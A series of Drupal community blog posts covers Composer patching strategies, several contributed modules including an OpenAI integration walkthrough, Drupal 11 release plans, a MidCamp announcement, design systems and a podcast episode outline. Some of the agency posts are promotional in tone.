Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "dev-8.x-2.x",
  }
}

It makes for a much cleaner project json, but now you’ve split the work into two locations, requiring some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this approach offers the least resistance and gets those changes out the most quickly.

The pros:

  • Reusability
  • Two smaller, simpler chunks of work
  • Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.

The cons:

  • Changes are in two separate places
  • Which patches are applied isn’t obvious in the composer.json and requires looking through the commit history on the forked repository
  • Requires maintenance and synchronization when upgrades happen

Final thoughts

As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.


Nov 24 2023

As I embarked on a recent journey to enhance the usability of Drupal from the perspective of both site owners and editors, I stumbled upon what could be a game changer for content editors – the "Same Page Preview" module.

This module offers an innovative solution, providing a page preview seamlessly integrated into the editing process. Say goodbye to the hassle of toggling between the edit form and a separate preview window. With the "Same Page Preview" module, it's all about real-time content visualisation and efficiency.

Key Features

Effortless Installation

Setting up the "Same Page Preview" module is a breeze, and it's a matter of a simple checkbox configuration against specific content types.
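
If you prefer the command line, installation follows the usual contrib pattern (assuming the project's machine name is same_page_preview):

$ composer require drupal/same_page_preview
$ drush en same_page_preview -y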

On-Page Canvas Preview

When adding or editing content, an on-page canvas preview elegantly unfolds. As you interact with the edit form fields, the preview updates in real time, offering an instant, dynamic view of your content.

Custom Display Options

Tailor your preview experience to your liking. Choose to open the display in a new window, view content in full-screen mode, or select your preferred display mode. The module is all about personalising your content editing workflow.

Why it matters 

Watch a Short Demo: https://youtu.be/Mh_plCpt1_A


The "Same Page Preview" module has recently received recognition on the Talking Drupal podcast, where its potential was discussed. Furthermore, there's an active issue in the Drupal core ideas project advocating for the inclusion of this module in the Drupal core.


In my opinion, integrating "Same Page Preview" into the Drupal core would be an invaluable asset. I've encountered numerous projects where the concept of in-page content previews has sparked considerable interest and discussion.


Join me in exploring the possibilities that this module brings to the Drupal community and in advocating for its inclusion in the Drupal core. Let's make content editing even more user-friendly and efficient.

Nov 24 2023

Do you know that almost 90% of developers who use Drupal as a backend for their mobile apps have their own stash of lucky coding socks? This is interesting because developers believe it allows them to work more efficiently.
We may have exaggerated that 90 percent, but building a mobile app with Drupal as a backend is a great fit. There are many reasons for this, because Drupal as a tool has all the necessary features and capabilities to fully unleash the potential of the application and, of course, emphasize the skill of its creator. But how does it work?
This article will look at the details of building a mobile app with Drupal. We will also discuss the advantages of Drupal for the backend and, of course, not forget about the difficulties that a developer may face. At the end of the article, we will look at effective and popular applications running on Drupal, allowing you to get acquainted with this magical system to the fullest. So let's get started!

Why would you need a Mobile App for your business?

Before we understand how Drupal helps developers create incredible mobile apps, it's worth remembering why your business needs an app. Like any business tool, a mobile application is extremely effective because most customers use smartphones daily. Thus, a Drupal mobile app can become the connection every business wants to build with its customers. Speaking more specifically about why your business needs a mobile app, the following aspects are worth mentioning:

  • Direct interaction - a mobile app allows you to "reach out" to your customers, notify them of all product updates and, of course, inform them about promotions.
  • Access at any time - the mobile app allows your customers to choose products or order services anytime. This way, you reach both those users who are used to thinking through their purchases thoroughly and those who are ready to order a new set of shoes or clothes right in the middle of the night. In addition, the app positively affects your brand awareness and allows you to create a certain company image.
  • Improving the level of loyalty - a high-quality mobile application reflects how you and your team treat your work. A high-quality app allows you to create a positive impression and gain a potential customer's trust.
  • Control and motivation - a mobile app gives you the tools to interact with and motivate customers. For example, with the help of promotions and discounts, you can stimulate customer interest in placing an order. In contrast, notifications about assortment updates will interest customers and motivate them to open the app.
  • Information and analytics - to build a successful business and attract new customers, you will need a lot of information, and a mobile app can offer it. Learn more about how much time users spend on a particular screen, understand what products they like, and offer a discount.

Having a mobile app allows you and your business to communicate with customers and clients without words. Given that a Drupal mobile app has literally unlimited potential, you can use it to achieve various goals, from increasing the number of sales to integrating a subscription system for your company's services. Such diversity is guaranteed to attract business interest. However, what role does Drupal play in all these advantages? This is what we will talk about next.

Drupal as a Backend for Mobile Apps

Can we use Drupal as the backend for mobile applications? Well, Drupal is a popular tool used in many niches. One of the main features of Drupal is its flexibility because hundreds of specialists and thousands of volunteers work on the system around the world. By involving volunteers in the development of the system, Drupal creators have found the golden fleece because every year, the joint efforts of volunteers and full-time developers provide users with new versions of Drupal and, with them, new opportunities.
In mobile applications, Drupal is implemented as a backend and serves as a tool that manages user data and the system as a whole. In addition to Drupal, you can use frameworks like React Native to develop mobile applications. React Native forms the application interface, while Drupal deals with data distribution and analysis. Due to its flexibility, Drupal is considered an ideal solution for mobile applications because it offers security in addition to a huge number of features.

Why is Drupal a suitable choice for mobile app backend development?

It is important for the user that the application they launch works not just correctly but as quickly and conveniently as possible. Due to its flexibility and range of features, Drupal is ideal for this role. Thanks to a wide range of constantly updated modules, developers can create literally any mobile application using Drupal. 
In addition, Drupal uses an API-first approach, providing reliable RESTful APIs that smooth the communication between the mobile app's interface and its Drupal backend.
This feature positively impacts the speed and correctness of data management, and speed is everything when it comes to mobile applications. Thus, Drupal has become one of the favorites in the market of backend solutions for mobile applications, but is that enough to become a leader? In our opinion, no. That's why Drupal developers have integrated many advantages into the system, which we will discuss further.
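
To make that concrete, here is a sketch assuming Drupal core's JSON:API module is enabled on a site at example.com; a mobile client can read content with plain HTTP requests:

# Fetch a collection of article nodes as JSON:API resources.
$ curl -H 'Accept: application/vnd.api+json' https://example.com/jsonapi/node/article

# Fetch a single node by UUID (placeholder UUID).
$ curl -H 'Accept: application/vnd.api+json' https://example.com/jsonapi/node/article/0a1b2c3d-0000-4000-8000-000000000000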

Advantages of using Drupal as a backend for mobile apps

  1. The main advantage of Drupal that everyone knows about is, of course, flexibility. The system can work quickly with large amounts of data and has many module integration opportunities. Thus, Drupal is a universal constructor that allows you to create an application with any functionality.
  2. Drupal uses an API-oriented approach, offering reliable RESTful APIs out of the box. This fact ensures no problems when exchanging data between Drupal itself and the application interface.
  3. As a backend for a mobile application, Drupal also boasts a wide range of modules. You can easily and quickly add the necessary modules to the system to expand the application's functionality. This feature makes Drupal a universal backend solution.
  4. To justify the investment in a mobile application, it must be able to scale. The multifunctionality and unlimited possibilities offered by Drupal and its modules are invaluable for developers.
  5. Security is an extremely important aspect of any mobile application, as most applications work with sensitive user data. Drupal can offer reliable protection that is constantly being improved. Thus, by using Drupal for your mobile application, you minimise the likelihood of customer data leakage and gain users' trust and loyalty.

Scalability and the availability of modules with which you can customize the backend of your application - Drupal offers all this. Suppose you add to this list the exceptional level of data security and clarity of the system. In that case, Drupal is a clear favorite for the backend of mobile applications.

5 Real-life examples of successful mobile apps built with Drupal as a backend

All the information described above was put together by specialists, but it's still just words. Is there evidence of Drupal's exclusivity? Of course there is! So that you can see for yourself that using Drupal for the backend is a reliable solution, we are going to show you the top 5 Drupal applications that have succeeded thanks to the system's capabilities.

1. The Olympics Official App

Unique Features: Thanks to the fast communication between the elements of the application, this mobile application is able to provide up-to-date information on the current situation at the Olympic Games in real time without delay or errors.
Challenges: The main challenge of implementing this application's functions was to simultaneously connect several data sources, integrate video broadcasting, and ensure that users do not experience any problems while using the application.
Drupal as a Backend: Due to the flexibility of Drupal, the developers managed not only to integrate all information sources but also to provide users with a positive experience of using the application.

2. Weather Underground App

Unique features: The Weather Underground app offers users localized weather forecasts on the subway. This allows them to successfully plan their stops and reach their destinations without encountering rain or other uncomfortable weather conditions.
Challenges: In order to provide reliable information, the application had to collect data from several resources simultaneously while implementing it in real-time.
Drupal as a backend: Thanks to its multitasking and data exchange speed, Drupal proved to be a great backend. The system easily handles the gigabytes of data constantly coming into the application, enabling users to track changes in the weather online exactly where they are and in real-time.

3. Memorial Sloan Kettering Cancer Center App

Unique features: MSKCC's app offers personalized information about cancer treatment, enables convenient communication with healthcare providers, and generally enables smartphone owners to learn more about the disease.
Challenges: The application developers' main challenge was implementing the highest level of personal data protection. However, thanks to Drupal, such protection became possible.
Drupal as a backend: Thanks to the advanced protection system that Drupal boasts, the application developers managed to implement an application with a degree of personal data protection that is not susceptible to any fraudster.

4. NBC News Mobile App

Unique features: With this application, users have the opportunity to view news that is algorithmically selected according to their interests and tastes. In addition, the app has a streaming feature so users can check out the latest news at any time.
Challenges: The application had to implement personalization by interests and functionality that would allow users to quickly absorb hundreds of articles and form a feed from them. A separate issue was the integration of video broadcasts with news.
Drupal as a backend: The availability of a large selection of modules for Drupal allowed the application developers to integrate the ability to view video broadcasts and create algorithms within the application responsible for personalizing the news feed.

5. The Weather Channel App

Unique features: The application is able to track information from all available weather stations and transmit information to the user in real-time without delay.
Challenges: The challenge of this application was the large amount of data and the large number of sources. However, thanks to Drupal multitasking, the functionality originally built into the system was fully realized.
Drupal as a backend: Thanks to the functionality of Drupal, the developers were able to achieve these indicators in terms of data transfer speed and data absorption, which ultimately allowed them to create an application with up-to-date weather that is updated in real-time.

Build a mobile app with Drupal and the Golems team!

In order to tell you more about Drupal as a backend, we have not only gone through its features but also introduced you to real examples of applications where Drupal was able to unleash an app's full potential. However, even this is not all. It should be borne in mind that the Drupal system, like its community, is constantly evolving. This means that there will be more and more opportunities in the future.
So, if you plan to create your own mobile application for customers, you need a backend that can quickly process a lot of data in real-time and not cause any discomfort for users - pay attention to Drupal. Start building your own mobile app with Drupal with the Golems web development agency and see the benefits of your own experience!

Nov 23 2023

Call for Speakers

MidCamp has hosted over 300 sessions since 2014 and we want to add your talk to that number. We’re looking for talks geared toward beginner through advanced Drupal users, as well as end users and business owners. Please see our session tracks page for full descriptions of the kinds of talks we are looking for. We'll also be holding a speaker workshop in December (date tbd) if you want to bounce around some ideas.

Submit a session now!

Important Dates:

  • Call for Proposals Open: November 22, 2023
  • Speaker Workshop: TBD
  • Proposal Deadline: December 22, 2023
  • Speakers Notified: January 23, 2024

P.S. We hear that some folks in Florida might like your submission too.

Sponsor MidCamp

MidCamp offers a variety of sponsorship packages that are designed to provide improved exposure, greater flexibility, and more opportunities for organizations to sponsor, regardless of budget. Sponsors make MidCamp possible.

We have opportunities starting at $600 and whether you’re looking to recruit new talent, grow your business, or just support the community—we have a package for you. The sooner you sign up, the more value you get.

Find the right sponsorship package for you!

Stay In The Loop

Join the MidCamp Slack and come hang out with the community online. We will be making announcements there from time to time. We’re also on X (formerly Twitter) and Mastodon.

Keep an eye on this space, we will be releasing more blog posts with venue details, hotel and travel options, fun social events, speaker announcements and more!

Have a great holiday, and don’t stop gobbling until MidCamp - in Chicago, March 20-22, 2024.

Nov 22 2023

New major release schedule

Beginning with Drupal 10, a new Drupal major version will be released every two years in even years (2022, 2024, etc.). Each major version will receive active support for about two years, followed by maintenance support and security coverage for about two more years. Each is supported until two more major versions have been released.

Chart illustrating the overlapping support of Drupal minor and major versions from 2024 to 2027, explained below.
This is an example.
The exact schedule varies, and will be published on the Drupal core release schedule.

Drupal 11 will be released in 2024

Drupal 11 will be released sometime in 2024. Like Drupal 9.0 and 10.0, Drupal 11.0 has three potential release windows, in June, August, and December. The window used will depend on when the beta requirements are complete. For more information, refer to the Drupal core release schedule.

Drupal 11 alpha development opens this week

Following the release of 10.2.0-beta1, changes to 11.x that diverge from Drupal 10 under the continuous upgrade path will begin. Anyone can get involved in completing the requirements for Drupal 11. Join the #d11readiness channel in the Drupal community Slack.

Maintenance minor versions of Drupal 10

Following the release of Drupal 11.0.0 in 2024, a long-term support phase for Drupal 10 begins, and it will include a new maintenance minor every six months. Each maintenance minor will contain a limited set of changes backported from Drupal 11. For more information, refer to the Drupal core release process overview.

Use a supported PHP version for the best ongoing support

Maintenance minor releases for Drupal 10 will keep adding support for newer PHP versions as they are released. The minimum supported PHP version for Drupal core follows the PHP core team's support cycle. (Reference: What does it mean for a PHP version to be supported?)

Site owners wishing to take advantage of Drupal 10's long-term support phase should ensure their platforms always use PHP versions supported by the PHP maintainers.

Announcement written in collaboration by Dave Long, Jess (xjm), Nathaniel Catchpole and Victoria Spagnolo.

Nov 21 2023
Nov 21

Authored by: Nadiia Nykolaichuk

Supercharging your workflows with artificial intelligence is one of the hottest trends of content editing on a Drupal website in 2023. Earlier this year, we published an article that explored the prospects of utilizing generative AI with CMSs like Drupal, along with an overview of some exciting Drupal modules for OpenAI/ChatGPT integration. This article will walk you through the specific steps of setting up and using one of the best options for your Drupal website — the OpenAI module. 

What the OpenAI module in Drupal is all about

The OpenAI module is a complex tool that supports a great variety of OpenAI/ChatGPT features for your Drupal website. It includes an impressive suite of submodules and an API foundation for seamless integration. 

It is worth noting that the module became a very early adopter of ChatGPT for Drupal — its first release came in January 2023. The full name of the module is OpenAI / ChatGPT / AI Search Integration. It is currently in its alpha stage but is being dynamically developed. It’s been created specifically for the latest major version of Drupal — Drupal 10, so it won’t work on older versions. 

Here are the submodules included:

  • OpenAI. This is the main module that provides an API for the integration and makes all other interactions possible.
  • OpenAI Audio. This submodule enables Drupal websites to interact with OpenAI audio (speech-to-text) endpoints.
  • OpenAI ChatGPT. This submodule provides a form in the Drupal admin dashboard for the interaction with OpenAI over the ChatGPT API endpoint.
  • OpenAI ChatGPT Devel Generate. This one helps the Devel module create more realistic dummy content using GPT and ChatGPT models, which helps in testing new functionality.
  • OpenAI CKEditor integration. This submodule adds a button for CKEditor 5 that provides AI-powered assistance with various tasks directly within the text editor.
  • OpenAI Content Tools. This one adds a set of assistive tools powered by Open AI to the content editing form.
  • OpenAI Embeddings. This submodule relies on OpenAI to analyze nodes and generate text embeddings (vector representations) from their content.
  • OpenAI Log Analyzer. This one makes it easier to understand the error log entries in Drupal by providing AI-powered explanations and potential solutions. 
  • OpenAI Prompt. This submodule adds a form to the Drupal admin dashboard where you can send prompts and get responses back from OpenAI.
The list of the OpenAI module’s submodules.

Step-by-step guide on how to use the OpenAI module in Drupal

Installation and basic setup

With the OpenAI module downloaded to your Drupal 10 website, you can enable only the submodules that you’re interested in using. For our demonstration, we’ll use:

  • the OpenAI ChatGPT
  • the OpenAI CKEditor integration
  • the OpenAI Content Tools.
Enabling the specific submodules within the OpenAI suite.
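
If you prefer to script this step, the submodules can also be enabled programmatically; a minimal sketch, assuming these machine names (verify them against the module's own .info.yml files before running):

\Drupal::service('module_installer')->install([
  'openai',          // main API module
  'openai_chatgpt',  // ChatGPT explorer form
  'openai_ckeditor', // CKEditor 5 button
  'openai_content',  // content editing tools
]);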

To proceed to the setup, either hit “Configure” next to the main OpenAI module on the Extend page or go to Configuration > OpenAI > Settings on your Drupal admin dashboard. You’ll see two fields for which you’ll need to provide the following credentials:

  • API key
  • organization name/ID
The fields for the credentials on the OpenAI settings page.

To get the API key, log in to your OpenAI account (or create a new one), select the “API” section, open the top-right user account menu, and click “View API keys.”

Finding the option to view API keys in the OpenAI user account menu.

You’ll need to generate a new API key, so click “Create new secret key” and optionally give it a name (for example, “Testing a Drupal module”). Copy the newly-created API key for further pasting on the Drupal website and click “Done.”

Creating a new secret key.

To get the organization’s name or ID, go to Settings on the left-hand organization menu.

Finding the Settings page in the OpenAI organization menu.

Generally, it’s less error-prone to use the organization ID rather than a name in configuration. So copy the ID and go back to the Drupal website.

Viewing the organization name and ID.

Enter the API key and the organization ID into the appropriate fields on the OpenAI Settings page of your Drupal site. 

Pasting the API key and the organization ID on a Drupal site.
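
If you manage configuration in code, the same credentials can be stored programmatically; a minimal sketch with hypothetical config object and key names ('openai.settings', 'api_key', 'api_org'), so check the module's config/install directory for the real ones:

// Read the secrets from the environment rather than hard-coding them.
\Drupal::configFactory()->getEditable('openai.settings')
  ->set('api_key', getenv('OPENAI_API_KEY'))
  ->set('api_org', getenv('OPENAI_ORG_ID'))
  ->save();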

Now that the basic setup is done, you can proceed to use specific functionalities provided by the module’s submodules.

How to use the OpenAI ChatGPT submodule

With the OpenAI ChatGPT submodule enabled, you can either click “Configure” next to it on the Extend page or go to Configuration > OpenAI and open the “ChatGPT explorer” link.

Finding the link to the ChatGPT explorer page in the Drupal admin dashboard.

It leads you to a UI for exploring and testing the OpenAI ChatGPT endpoint. You can enter a prompt in the “Ask ChatGPT” field and wait for the response to appear in the “Response” field.

Interacting with ChatGPT on the ChatGPT Explorer page.

The Options tab has some settings that you don’t necessarily need to change; you can stick with the sensible defaults instead. Still, it’s useful to know what they are:

  • Model. Here, you can select a specific model out of OpenAI’s set of models. The default one is GPT-3.5 Turbo, and that’s what is used in our demonstration. 
  • Temperature. Higher temperature values (like 0.8) provide responses that can be characterized as more random, creative, diverse, and unexpected. Responses with lower temperature values (like 0.2) are seen as more focused, deterministic, straightforward, and predictable.
  • Maximum tokens to generate. Tokens in OpenAI are the building blocks of language. A token can be from one character to one word long. Specifying maximum tokens is a way to give the model guidance on how long or short you want its responses to be. In any case, they cannot exceed your model’s context length.
  • Profile. This setting helps you shape the ChatGPT’s behavior, where the default “you’re a friendly helpful assistant” looks perfectly fine.
Available options on the ChatGPT Explorer page.

How to use the OpenAI CKEditor integration submodule

As mentioned above, the module is designed for Drupal 10, so when we talk about CKEditor integration, we mean the new CKEditor 5. The availability of this integration makes the OpenAI module one of the most interesting Drupal modules to extend CKEditor 5.

With the OpenAI CKEditor integration submodule enabled, you’ll need to add the OpenAI button to the CKEditor 5 toolbar. For this purpose, just go to Configuration > Content authoring > Text formats and editors and click “Configure” next to the specific format (Full HTML, Restricted HTML, or Basic HTML).

Once on the specific format’s settings page, drag the button from the “Available buttons” to the “Active toolbar.”

Adding the OpenAI button to the CKEditor 5 toolbar.

Scroll a little down to CKEditor 5 plugin settings, find the OpenAI tools plugin, and be sure to tick the “Enabled” checkbox for the “Text completion” option. You’ll also see the model, temperature, and maximum tokens settings, similar to those we’ve already described in the ChatGPT submodule part.

Setting up the “OpenAI tools” plugin for CKEditor.

Scroll down to the bottom of the page to click “Save configuration.”

With this done, you can go to Content > Add content, and see the OpenAI button on your CKEditor 5 toolbar. It opens a dropdown menu of available AI-powered actions that can be applied to text. There is an “OpenAI status: Idle” message in the bottom right corner, which will change at the moment of actual interaction. 

The menu of actions available with the OpenAI button in CKEditor.

If you select “Text Completion” from the dropdown, a balloon panel will appear for writing an idea or suggestion (for example, “Please write a paragraph about how AI works”). When done, click the green check mark, which you might be familiar with if you have already worked with CKEditor 5’s interface.

Providing an idea for text completion in CKEditor.

Wait for the response for a little while and the requested paragraph about how AI works appears in the text area.

An example of AI-generated text based on the provided idea in CKEditor.

It is noteworthy that for other actions, you need to select the text first. 

Selecting the text to apply available actions to.

With the text selected, click “Summarize” — and you’ll see a summary of the text.

An example of AI-summarized text in CKEditor.

If you select the text and click “Adjust tone/voice” in the OpenAI dropdown, it will show you a balloon panel where you’ll need to enter an adjective/descriptive phrase about what you want the tone to be like. In this example, let’s write “Fairy-tale” and hit the green check mark.

Providing a keyword for the desired tone/voice.

In a while, the text about AI is transformed into something truly magical.

An example of the text tone and voice adjusted by AI in CKEditor.

If you select the text and choose “Translate” on the OpenAI dropdown, it will offer you a balloon panel for specifying the language. In this example, we’ve entered “Spanish.”

Providing the desired language for translation.

And the magical fairy tale is translated into Spanish directly in the text area. 

An example of the AI-translated text in CKEditor.

To test the “Reformat/Correct HTML” options, let’s write some gibberish HTML imitating the anchor link formatting but with obvious errors. It doesn’t even matter that we’re doing it directly in the text area without going to the source code.

Writing some faulty HTML for testing purposes.

When this line is selected and the “Reformat/Correct HTML” option is clicked, artificial intelligence successfully corrects the HTML errors and creates a normal anchor link.

An example of HTML formatting fixed by AI in CKEditor.

How to use the OpenAI Content Tools submodule

Besides the assistance options directly in the text editor, there are more listed to the right-hand side of the node editing form. They are provided by the OpenAI Content Tools submodule. 

As opposed to how the CKEditor integration submodule works, all suggestions by Content Tools just appear in the right-hand panel, with no changes applied to the actual node text. Let’s see what you can do here using an example of a text about SEO that has just been AI-generated in CKEditor.

You can click “Suggest taxonomy” and choose the field with the text you want to be AI-processed (in this case, it will be the body field). 

Using the “Suggest taxonomy” feature.

AI-suggested taxonomy tags appear in a while. 

An example of AI-suggested taxonomy.

Next, you can ask OpenAI to “Suggest content title” and this time, it will be the title field that you’ll need to select. In a few seconds, artificial intelligence suggests the title of the text.

An example of an AI-generated title.

If you click “Summarize” and select the body field, you’ll get a summary of your text in a while.

An example of an AI-created text summary.

The “Adjust content tone” option allows you to choose the tone from the dropdown (friendly, professional, helpful, high school level reader, college-level reader, and “explain like I’m 5”). As usual, select the field for this action (in this case, body).

Selecting the tone for the “Adjust content tone” feature.

AI provides a version of the text based on the selected tone (in this example, “explain like I’m 5”). The screenshot below shows OpenAI’s version of what a 5-year-old is supposed to understand (this looks a little doubtful, but we’re here just to demonstrate the features). 

Please note that using simple language is an essential practice for creating accessible content, and the “Adjust content tone” option might be interesting in this regard.

An example of AI-adjusted text tone.

Finally, there’s the “Analyze text” option that checks the text for compliance with various policies. Let’s use it for the body field and, as expected, there’s a confirmation from OpenAI that the text doesn’t violate anything.

The result of the AI-performed text analysis for compliance.

Troubleshooting

You might see the “Website encountered an unexpected error” message directly in the text area. There’s no reason to worry — the actual explanation of what happened can be found on the Reports > Recent log messages page of the Drupal website (/admin/reports/dblog). 

You might, for example, see an error log telling you there is no such organization. To fix that, you’ll need to go to the Configuration > OpenAI Settings on your Drupal admin dashboard and make sure you’ve entered the organization ID (not name). Another example is seeing the message “You exceeded your current quota, please check your plan and billing details.” This means you’ll need to go to the OpenAI website and check your plan or just test the Drupal integration from a different OpenAI account for a start. 

Being in its alpha stage, the module still has a number of open issues; browsing its issue queue on drupal.org can be helpful when you need to troubleshoot.

Final thoughts

It’s really inspiring to know that the “team” of Drupal modules for integration with various third-party tools has got such a brilliant addition as the OpenAI module. When used with proper caution, AI can genuinely boost the content workflows of many teams, especially on large content-heavy websites, which are abundant among our customer base. And, as we see from the list of the OpenAI submodules, some of its capabilities go beyond content, helping development and testing as well. 

Whenever you need any assistance with integrating artificial intelligence tools with your Drupal website, our experienced Drupal team will be happy to help.

Nov 21 2023
Nov 21

Claro has been the default administration theme for Drupal for more than one year now. The list of issues and new features that we want to introduce has been growing and we’d like to bring the community together to join forces and finish initiatives needed for the new improvements (like CSS modernization) or review each other's work and get it committed.

We’ll prepare and organize efforts in advance with issues for all levels and profiles, and we’ll work on several time zones.

Join this community effort on the #admin-ui Drupal Slack channel on December 15th, 2023 and we’ll have work ready for you.

Nov 21 2023
Nov 21

Introduction

When the healthcare.gov website launched in 2013, it was a complete disaster for several reasons.

  • Initially, users had to register for an account before shopping for plans. This was a fundamental UX design flaw, causing frustration among customers.
  • 250,000 users, five times the expected amount, tried to use the website. This caused the website to crash within two hours.  
  • The website's inability to work with other sites, like the Internal Revenue Service website or the Department of Veterans Affairs site, made things worse.

Ultimately, the site was taken down during the first weekend. These sorts of issues are often rooted in design debt.

Design debt involves quick design choices, compromising user experience to expedite product release. This, along with hasty coding decisions, can lead to failed product launches. 

Implementing a design system helps solve these issues and ensures efficient digital product delivery.

What Is A Design System?


A design system is a collection of reusable components with clear standards that guide teams while creating digital products. It streamlines workflows, maintains consistency, and offers a cohesive user experience.  

A design system is the single source of truth which groups all the elements that will allow the teams to design, realize and develop a product.

~ Audrey Hacq, Design System Advocate

A basic design system consists of components:

Design System Components

Style Guides

Style guides establish consistent visual and brand guidelines, including typography, color palettes, and iconography. These guides reduce errors and revisions by providing a standard reference, saving time during product development.

Spotify Style Guide

Component Libraries

Component libraries contain reusable UI elements like buttons, forms, and navigation bars. These simplify the development of the digital product, enhance consistency, and accelerate the creation of the user interface.

Shopify Polaris Component Library

Design Principles

Design principles accelerate development cycles by reducing iterations. This results in a more focused and efficient design process.

Salesforce Lightning Design System - Design Principles

Pattern Libraries

Pattern libraries are curated sets of reusable UI elements and design patterns. These promote consistency and efficiency in design and development, ensuring timely delivery.

Adobe Spectrum Pattern Libraries

Documentation

Guides and references help teams use and maintain the design system. This clear guidance minimizes errors and boosts development efficiency, leading to faster product delivery.

Storybook Documentation

Icon Library

Icon libraries provide standardized graphics that help simplify and accelerate the design and development process.

Google Icon Library - Audio and Video

UI Kits

UI kits are pre-designed sets of UI elements, which help maintain a unified look and feel of a product. Designers and developers can select and incorporate these elements, saving time and effort in creating them from scratch.

Google Material 3 Design Kit

Accessibility Guidelines

Accessibility guidelines provide a framework for maintaining inclusivity across interfaces. These guidelines include screen reader compatibility, keyboard navigation, and alternatives for non-text content.

Accessibility Guideline Example From Material Design

Design Tokens

Design tokens store design decisions like colors and typography in a reusable and consistent format. They serve as a common language between designers and developers.

Google Material Design Token

Content Guidelines

Content guidelines include rules and recommendations for producing and managing text, images, and multimedia content. The guidelines help maintain brand consistency, tone, and quality across all written and visual materials.

Mailchimp Content Guidelines

How Do Design Systems Help Businesses?

A design system offers a structured approach to fixing critical business problems.

Business Challenges

Benefits Of Implementing Design Systems

Teams Working In Silos

Teams working in silos often tend to work on similar components and solve the same design problems. This situation results in the duplication of assets and chaos.

Uber's app redesign in 2016 received negative feedback for changes in its user interface. The lack of effective collaboration between design and development teams caused confusion and led to a poor user experience.

By implementing design systems, designers and developers can align better and collaborate for faster product delivery.

New Team Member Onboarding

New team members are easier to onboard on a project with a design system. It enables them to contribute more quickly to the design and development process.  

According to an experiment by Figma, with relevant design systems, designers are 34% more productive.

High Resource Costs

Organizations tend to shy away from a design system as they don’t see the long-term benefits of implementing it. Contrary to this, design systems help organizations optimize resources, leading to a higher ROI and faster product delivery.

Smashing Magazine provides a detailed guide to calculate the ROI of a design system.

Maintain Relevance

Design systems need to evolve continuously. By using up-to-date design systems, organizations can launch market-relevant products with minimal iterations.

Google's Material Design and Apple's Human Interface Guidelines are two dynamic design systems prioritizing user-centered experiences. These systems offer extensive resources and guidance for teams.

Vital Considerations For Implementing A Design System In Your Organization

Visual design systems are based on a brand’s objectives. Regardless of the organization’s size, these offer a range of universal benefits. It’s critical to customize the design system to align with a brand's unique needs and scale. 

Here are some vital considerations for implementing a design system in your organization:

Establish Visual Branding

Ideally, you should ensure your product's visual branding is in place. For this, you need to make definitive decisions with your core team. Commit to your choice for at least a few years, which helps establish stability and consistency. 

Spotify's visual branding centers on vibrant green showcased in a distinctive circular logo. While Spotify has subtly adjusted its visual branding over the years to stay current with design trends, core elements like the green color and circular logo have remained consistent.

If your organization's visual branding is still in progress, finalize it before developing any content library or comprehensive design system. 

Evaluate Tech Stack And Platforms

If you have the visual branding established, assess the brand's tech stack and check its compatibility with the design system. If that is not an immediate option, consider starting with a small yet scalable content library.

Ready-to-use platforms like Storybook are great if you want to opt for a plug-and-play structure. Use them for building content libraries, which eventually expand into a complete design system.

Opt For Custom Design Systems

Organizations with a mature digital product and well-defined brand vision should go for customized design systems. The systems should draw inspiration from the brand's existing digital assets and guidelines, if any.

IBM's Carbon design system was instrumental in designing and developing a new self-service purchase experience on IBM.com. After the transition, over 50% of customers started converting, which led to a large increase in orders and revenue.

Consider Creating A Custom Typeface

You can also opt for a custom typeface to leverage your existing design system. Changing the typeface across your digital product is a rebranding process. It is an idea worth exploring if you’re aiming to enhance brand recognition.  

Airbnb’s custom typeface Cereal helps establish a distinct and cohesive visual language for the brand. Brands like Netflix, General Electric, Intel, and Coca-Cola also have custom typefaces across their products.

How Axelerant Contributed To Red Hat’s Developer Portal’s Design System

For over eight years, Axelerant has been a trusted partner in delivering technology and design services to Red Hat. In a collaborative effort, Axelerant’s experts played a crucial role in enhancing the effectiveness of the brand’s existing design system by:

Resolving Typography Inconsistencies

Axelerant’s experts helped resolve font size inconsistencies in adopting the design system by renaming typography styles and defining when and where each could be used.

Extending The Design System

Red Hat’s web guidelines were well-defined, but there were no specific directives for mobile interfaces. The team needed to create the mobile-responsive states missing from the existing design system, so mobile-responsive UI components were added as a solution.

Introduction Of Tiles UI Components

Red Hat’s content types, including blogs, cheat sheets, ebooks, interactive tutorials, and events, were presented in irregular box sizes on the portal. To address this issue, consistent tile components with standardized dimensions were implemented. The content was reorganized within these tiles to establish a higher level of uniformity throughout the platform.

With this new and improved design system in place, the brand can accelerate product delivery.

At Axelerant, we help organizations create new or leverage existing design systems to streamline digital product delivery. Schedule a call with our experts to learn more. 

Nov 20 2023
Nov 20

Today we are talking about a new Drupal book, Modernizing Drupal 10 Theme Development, what’s new in Drupal 10 theming, and tools that can help speed up theming with guest Luca Lusso. We’ll also cover Admin Dialogs as our module of the week.

For show notes visit:
www.talkingDrupal.com/425

Topics

  • Why write a book about Drupal theming
  • How does the book modernize theming
  • Who is the book for
  • Do you have to have a certain level of knowledge to start
  • What are some new aspects of Drupal 10 that are covered in the book
  • Does the book talk about:
    • Javascript frameworks
    • Native Web Components
  • What tools outside of Drupal do you talk about
  • How did you conduct your research
  • Do you have plans to keep the github updated
  • How long did it take to write the book
  • Tech moves quickly, what is the shelf-life of the book
  • Future editions
  • Purchase from Amazon or Packt
  • Translation
  • Plans for another book

Resources

Guests

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Jacob Rockowitz - @jrockowitz

  • Brief description: (from the maintainer)
  • Brief history
    • How old: Created in May 2023
    • Versions available: 1.0.x stable release
    • Last release: 1.0.17 - July 12, 2023
  • Maintainership
    • Actively maintained? Yes
    • Number of open issues: 6
    • Test coverage
      • No test coverage
      • Module is fairly simple and easy to manually test
      • Code quality is very good
  • Usage stats:
    • 150+ sites
  • Maintainer(s):
  • Sponsor
    • Chapter Three
  • Module features and usage
    • Comes with the ability to add modal or off-canvas dialogs to different links in Drupal.
